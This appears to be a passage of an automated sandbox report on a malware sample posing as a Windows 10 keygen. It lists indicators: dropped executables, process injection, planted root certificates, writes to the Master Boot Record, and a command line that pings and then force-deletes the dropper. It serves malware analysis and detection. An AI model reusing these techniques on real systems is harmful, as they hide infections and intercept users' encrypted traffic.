timeout.exetimeout.exetimeout.exetimeout.exepid process 7780 timeout.exe 5588 timeout.exe 6684 timeout.exe 9940 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
multitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe -
Kills process with taskkill 36 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exeTASKKILL.exetaskkill.exetaskkill.exepid process 15748 taskkill.exe 12580 taskkill.exe 5904 taskkill.exe 6220 taskkill.exe 7056 taskkill.exe 10692 taskkill.exe 13384 taskkill.exe 14564 taskkill.exe 9152 taskkill.exe 12064 taskkill.exe 10012 taskkill.exe 15632 taskkill.exe 9736 taskkill.exe 7200 taskkill.exe 7264 taskkill.exe 13460 taskkill.exe 2232 taskkill.exe 13328 taskkill.exe 8088 taskkill.exe 6156 taskkill.exe 4524 taskkill.exe 5984 taskkill.exe 8152 taskkill.exe 4684 taskkill.exe 11568 taskkill.exe 7108 taskkill.exe 10084 taskkill.exe 4184 taskkill.exe 11684 taskkill.exe 11796 taskkill.exe 10780 taskkill.exe 3844 taskkill.exe 4100 taskkill.exe 7536 TASKKILL.exe 12688 taskkill.exe 14476 taskkill.exe -
Modifies data under HKEY_USERS 1 IoCs
Processes:
file.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\PegasPc file.exe -
Processes:
Setup.exeaskinstall20.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\6C0CE2DD0584C47CAC18839F14055F19FA270CDD\Blob = 0300000001000000140000006c0ce2dd0584c47cac18839f14055f19fa270cdd2000000001000000500500003082054c30820434a0030201020206016de34cff62300d06092a864886f70d01010b05003081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a301e170d3030303130313030303030305a170d3438313231353039313533375a3081aa313b303906035504030c32436861726c65732050726f78792043412028313920e58d81e69c8820323031392c204445534b544f502d424e41543131552931253023060355040b0c1c68747470733a2f2f636861726c657370726f78792e636f6d2f73736c3111300f060355040a0c08584b3732204c74643111300f06035504070c084175636b6c616e643111300f06035504080c084175636b6c616e64310b3009060355040613024e5a30820122300d06092a864886f70d01010105000382010f003082010a0282010100ae86c5043ed34d99f44fa3052ea34047a7fbbe33188b1dc2ca645ca3249e85e54b4921d4998fda6a22247c32d9087d742af3bf850803ae8c1e25faad53fb8fd823b7353d9a3ac992bf917f693826c790e53a540b120b6553508ec9585e467d310bd3ef9fb61731deb522eb78f43f824b34be36782db7a8cb162cd22247b14e4c5ae633ed66542354a59971bddc59160ecdc521b4477c93ca9e624e0af00298602300f5dc368819c3cb9f02604636888276b3a498570473b5328b0834f327c34285e333da9207e12f0edbb654c8cf11e3cc7cba17a52cd7cd42c10ae095a2e4eb9d3e3f361488243f0584af40e72d6e6e182149bfb8342384f60f12e14734258d0203010001a382017430820170300f0603551d130101ff040530030101ff3082012c06096086480186f842010d0482011d138201195468697320526f6f74206365727469666963617465207761732067656e65726174656420627920436861726c65732050726f787920666f722053534c2050726f7879696e672e20496620746869732063657274696669636174652069732070617274206f66206120636572746966696361746520636861696e2c2074686973206d65616e73207468617420796f752772652062726f7773696e67207468726f75676820436861726c65732050726f787920776974682053534c2050726f7879696e6720656e61626c656420666f72207468697320776562736974652e20506c656173652073656520687474703a2f2f636861726c657370726f78792e636f6d2f73736c20666f72206d6f726520696e666f726d6174696f6e2e300e0603551d0f0101ff040403020204301d0603551d0e04160414f8d0dc54367cf794020f8b92783a5d8a91251f9f300d06092a864886f70d01010b05000382010100662271eb9d5c744c88382de98ba37320e6312104d04273a92007a8670976d6530e6347d00bbded1319bb6754f36237596095922911e3661a70354f6ba0b797a76258be7adebb8c8dbeeed977760b80271d74b2444d92f6c1337a379b73545b251de5f8812b9625abbbfaedc15f8c6c374b9b26dd0fef035185f5899d8819e689dc6db5f0babbfd637c52b1bec80115b889faeed493d4112d744954ad3abe6607c41a4a2d657ba330ed131fa4e8c25bb28ee181dcef8da91c17bfd30a23c8eae81b152ed85ff938afc32b34ffdaffbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 askinstall20.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e askinstall20.exe -
Runs .reg file with regedit 2 IoCs
Processes:
regedit.exeregedit.exepid process 7548 regedit.exe 6672 regedit.exe -
Runs ping.exe 1 TTPs 5 IoCs
Processes:
PING.EXEPING.EXEPING.EXEPING.EXEPING.EXEpid process 3436 PING.EXE 2272 PING.EXE 4416 PING.EXE 4696 PING.EXE 7096 PING.EXE -
Script User-Agent 43 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 1621 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1756 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1972 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 280 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 467 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1055 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1127 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1319 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1359 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 257 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 936 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1225 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1296 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1607 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1636 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 102 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 529 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 788 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1125 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1547 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1721 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2097 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 471 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 181 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1065 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1270 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1738 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1922 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 2078 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 103 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1118 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 106 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1552 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1629 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1823 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1914 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 615 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 795 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1132 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1257 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1828 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1899 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 578 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
key.exe1615299557069.exe1615299561287.exe1615299566569.exemultitimer.exefile.exepid process 64 key.exe 64 key.exe 4144 1615299557069.exe 4144 1615299557069.exe 4016 1615299561287.exe 4016 1615299561287.exe 1232 1615299566569.exe 1232 1615299566569.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 4864 file.exe 4864 file.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe 1576 multitimer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
msiexec.exemsiexec.exedescription pid process Token: SeShutdownPrivilege 748 msiexec.exe Token: SeIncreaseQuotaPrivilege 748 msiexec.exe Token: SeSecurityPrivilege 3920 msiexec.exe Token: SeCreateTokenPrivilege 748 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 748 msiexec.exe Token: SeLockMemoryPrivilege 748 msiexec.exe Token: SeIncreaseQuotaPrivilege 748 msiexec.exe Token: SeMachineAccountPrivilege 748 msiexec.exe Token: SeTcbPrivilege 748 msiexec.exe Token: SeSecurityPrivilege 748 msiexec.exe Token: SeTakeOwnershipPrivilege 748 msiexec.exe Token: SeLoadDriverPrivilege 748 msiexec.exe Token: SeSystemProfilePrivilege 748 msiexec.exe Token: SeSystemtimePrivilege 748 msiexec.exe Token: SeProfSingleProcessPrivilege 748 msiexec.exe Token: SeIncBasePriorityPrivilege 748 msiexec.exe Token: SeCreatePagefilePrivilege 748 msiexec.exe Token: SeCreatePermanentPrivilege 748 msiexec.exe Token: SeBackupPrivilege 748 msiexec.exe Token: SeRestorePrivilege 748 msiexec.exe Token: SeShutdownPrivilege 748 msiexec.exe Token: SeDebugPrivilege 748 msiexec.exe Token: SeAuditPrivilege 748 msiexec.exe Token: SeSystemEnvironmentPrivilege 748 msiexec.exe Token: SeChangeNotifyPrivilege 748 msiexec.exe Token: SeRemoteShutdownPrivilege 748 msiexec.exe Token: SeUndockPrivilege 748 msiexec.exe Token: SeSyncAgentPrivilege 748 msiexec.exe Token: SeEnableDelegationPrivilege 748 msiexec.exe Token: SeManageVolumePrivilege 748 msiexec.exe Token: SeImpersonatePrivilege 748 msiexec.exe Token: SeCreateGlobalPrivilege 748 msiexec.exe Token: SeCreateTokenPrivilege 748 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 748 msiexec.exe Token: SeLockMemoryPrivilege 748 msiexec.exe Token: SeIncreaseQuotaPrivilege 748 msiexec.exe Token: SeMachineAccountPrivilege 748 msiexec.exe Token: SeTcbPrivilege 748 msiexec.exe Token: SeSecurityPrivilege 748 msiexec.exe Token: SeTakeOwnershipPrivilege 748 msiexec.exe Token: SeLoadDriverPrivilege 748 msiexec.exe Token: SeSystemProfilePrivilege 748 msiexec.exe Token: SeSystemtimePrivilege 748 msiexec.exe Token: SeProfSingleProcessPrivilege 748 msiexec.exe Token: SeIncBasePriorityPrivilege 748 msiexec.exe Token: SeCreatePagefilePrivilege 748 msiexec.exe Token: SeCreatePermanentPrivilege 748 msiexec.exe Token: SeBackupPrivilege 748 msiexec.exe Token: SeRestorePrivilege 748 msiexec.exe Token: SeShutdownPrivilege 748 msiexec.exe Token: SeDebugPrivilege 748 msiexec.exe Token: SeAuditPrivilege 748 msiexec.exe Token: SeSystemEnvironmentPrivilege 748 msiexec.exe Token: SeChangeNotifyPrivilege 748 msiexec.exe Token: SeRemoteShutdownPrivilege 748 msiexec.exe Token: SeUndockPrivilege 748 msiexec.exe Token: SeSyncAgentPrivilege 748 msiexec.exe Token: SeEnableDelegationPrivilege 748 msiexec.exe Token: SeManageVolumePrivilege 748 msiexec.exe Token: SeImpersonatePrivilege 748 msiexec.exe Token: SeCreateGlobalPrivilege 748 msiexec.exe Token: SeCreateTokenPrivilege 748 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 748 msiexec.exe Token: SeLockMemoryPrivilege 748 msiexec.exe -
Suspicious use of FindShellTrayWindow 39 IoCs
Processes:
msiexec.exeSetup3310.tmpchashepro3.tmpml2kmot14q2.tmpIBInstaller_97039.tmpvpn.tmppid process 748 msiexec.exe 4600 Setup3310.tmp 4728 chashepro3.tmp 4740 ml2kmot14q2.tmp 4956 IBInstaller_97039.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp 4816 vpn.tmp -
Suspicious use of SetWindowsHookEx 28 IoCs
Processes:
Setup.exeAD754B4D3FE2C4EE.exeAD754B4D3FE2C4EE.exefirefox.exe1615299557069.exefirefox.exe1615299561287.exefirefox.exe1615299566569.exeSetup3310.exeaskinstall24.exeml2kmot14q2.exeSetup3310.tmpchashepro3.exevpn.exechashepro3.tmpml2kmot14q2.tmpvpn.tmpIBInstaller_97039.exeIBInstaller_97039.tmpBrava.exewinlthst.exeapp.exezm2envmeni4.exechrome_proxy.exezm2envmeni4.tmpSetup.exeSetup.tmppid process 2084 Setup.exe 2412 AD754B4D3FE2C4EE.exe 2784 AD754B4D3FE2C4EE.exe 1576 firefox.exe 4144 1615299557069.exe 5104 firefox.exe 4016 1615299561287.exe 1620 firefox.exe 1232 1615299566569.exe 4468 Setup3310.exe 4512 askinstall24.exe 4588 ml2kmot14q2.exe 4600 Setup3310.tmp 4636 chashepro3.exe 4704 vpn.exe 4728 chashepro3.tmp 4740 ml2kmot14q2.tmp 4816 vpn.tmp 4832 IBInstaller_97039.exe 4956 IBInstaller_97039.tmp 3232 Brava.exe 584 winlthst.exe 4532 app.exe 4148 zm2envmeni4.exe 4568 chrome_proxy.exe 4308 zm2envmeni4.tmp 4580 Setup.exe 5164 Setup.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Windows_10_Pro_x64_Includes_keygen_by_KeygenNinja.execmd.exekeygen-pr.exekeygen-step-4.exekeygen-step-3.exekey.execmd.exeSetup.exemsiexec.execmd.exeaskinstall20.exedescription pid process target process PID 1908 wrote to memory of 3128 1908 Windows_10_Pro_x64_Includes_keygen_by_KeygenNinja.exe cmd.exe PID 1908 wrote to memory of 3128 1908 Windows_10_Pro_x64_Includes_keygen_by_KeygenNinja.exe cmd.exe PID 1908 wrote to memory of 3128 1908 Windows_10_Pro_x64_Includes_keygen_by_KeygenNinja.exe cmd.exe PID 3128 wrote to memory of 752 3128 cmd.exe keygen-pr.exe PID 3128 wrote to memory of 752 3128 cmd.exe keygen-pr.exe PID 3128 wrote to memory of 752 3128 cmd.exe keygen-pr.exe PID 3128 wrote to memory of 736 3128 cmd.exe keygen-step-1.exe PID 3128 wrote to memory of 736 3128 cmd.exe keygen-step-1.exe PID 3128 wrote to memory of 736 3128 cmd.exe keygen-step-1.exe PID 3128 wrote to memory of 496 3128 cmd.exe keygen-step-3.exe PID 3128 wrote to memory of 496 3128 cmd.exe keygen-step-3.exe PID 3128 wrote to memory of 496 3128 cmd.exe keygen-step-3.exe PID 3128 wrote to memory of 1304 3128 cmd.exe keygen-step-4.exe PID 3128 wrote to memory of 1304 3128 cmd.exe keygen-step-4.exe PID 3128 wrote to memory of 1304 3128 cmd.exe keygen-step-4.exe PID 752 wrote to memory of 64 752 keygen-pr.exe key.exe PID 752 wrote to memory of 64 752 keygen-pr.exe key.exe PID 752 wrote to memory of 64 752 keygen-pr.exe key.exe PID 1304 wrote to memory of 2084 1304 keygen-step-4.exe Setup.exe PID 1304 wrote to memory of 2084 1304 keygen-step-4.exe Setup.exe PID 1304 wrote to memory of 2084 1304 keygen-step-4.exe Setup.exe PID 496 wrote to memory of 3936 496 keygen-step-3.exe cmd.exe PID 496 wrote to memory of 3936 496 keygen-step-3.exe cmd.exe PID 496 wrote to memory of 3936 496 keygen-step-3.exe cmd.exe PID 64 wrote to memory of 3924 64 key.exe key.exe PID 64 wrote to memory of 3924 64 key.exe key.exe PID 64 wrote to memory of 3924 64 key.exe key.exe PID 64 wrote to memory of 3924 64 key.exe key.exe PID 64 wrote to memory of 3924 64 key.exe key.exe PID 64 wrote to memory of 3924 64 key.exe key.exe PID 64 wrote to memory of 3924 64 key.exe key.exe PID 64 wrote to memory of 3924 64 key.exe key.exe PID 64 wrote to memory of 3924 64 key.exe key.exe PID 64 wrote to memory of 3924 64 key.exe key.exe PID 64 wrote to memory of 3924 64 key.exe key.exe PID 64 wrote to memory of 3924 64 key.exe key.exe PID 64 wrote to memory of 3924 64 key.exe key.exe PID 64 wrote to memory of 3924 64 key.exe key.exe PID 64 wrote to memory of 3924 64 key.exe key.exe PID 3936 wrote to memory of 3436 3936 cmd.exe PING.EXE PID 3936 wrote to memory of 3436 3936 cmd.exe PING.EXE PID 3936 wrote to memory of 3436 3936 cmd.exe PING.EXE PID 2084 wrote to memory of 748 2084 Setup.exe msiexec.exe PID 2084 wrote to memory of 748 2084 Setup.exe msiexec.exe PID 2084 wrote to memory of 748 2084 Setup.exe msiexec.exe PID 3920 wrote to memory of 3488 3920 msiexec.exe MsiExec.exe PID 3920 wrote to memory of 3488 3920 msiexec.exe MsiExec.exe PID 3920 wrote to memory of 3488 3920 msiexec.exe MsiExec.exe PID 2084 wrote to memory of 2412 2084 Setup.exe AD754B4D3FE2C4EE.exe PID 2084 wrote to memory of 2412 2084 Setup.exe AD754B4D3FE2C4EE.exe PID 2084 wrote to memory of 2412 2084 Setup.exe AD754B4D3FE2C4EE.exe PID 2084 wrote to memory of 2784 2084 Setup.exe AD754B4D3FE2C4EE.exe PID 2084 wrote to memory of 2784 2084 Setup.exe AD754B4D3FE2C4EE.exe PID 2084 wrote to memory of 2784 2084 Setup.exe AD754B4D3FE2C4EE.exe PID 2084 wrote to memory of 2964 2084 Setup.exe cmd.exe PID 2084 wrote to memory of 2964 2084 Setup.exe cmd.exe PID 2084 wrote to memory of 2964 2084 Setup.exe cmd.exe PID 1304 wrote to memory of 1136 1304 keygen-step-4.exe askinstall20.exe PID 1304 wrote to memory of 1136 1304 keygen-step-4.exe askinstall20.exe PID 1304 wrote to memory of 1136 1304 keygen-step-4.exe askinstall20.exe PID 2964 wrote to memory of 2272 2964 cmd.exe PING.EXE PID 2964 wrote to memory of 2272 2964 cmd.exe PING.EXE PID 2964 wrote to memory of 2272 2964 cmd.exe PING.EXE PID 1136 wrote to memory of 2228 1136 askinstall20.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Windows_10_Pro_x64_Includes_keygen_by_KeygenNinja.exe"C:\Users\Admin\AppData\Local\Temp\Windows_10_Pro_x64_Includes_keygen_by_KeygenNinja.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1908 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:64 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
- Executes dropped EXE
PID:3924
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
PID:736
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:496 -
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
PID:3436
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"4⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"5⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:748
-
-
C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exeC:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 0011 installp15⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:2412 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:1576
-
-
C:\Users\Admin\AppData\Roaming\1615299557069.exe"C:\Users\Admin\AppData\Roaming\1615299557069.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615299557069.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4144
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:5104 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.17⤵
- Runs ping.exe
PID:4696
-
-
-
C:\Users\Admin\AppData\Roaming\1615299561287.exe"C:\Users\Admin\AppData\Roaming\1615299561287.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615299561287.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4016
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:1620
-
-
C:\Users\Admin\AppData\Roaming\1615299566569.exe"C:\Users\Admin\AppData\Roaming\1615299566569.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615299566569.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1232
-
-
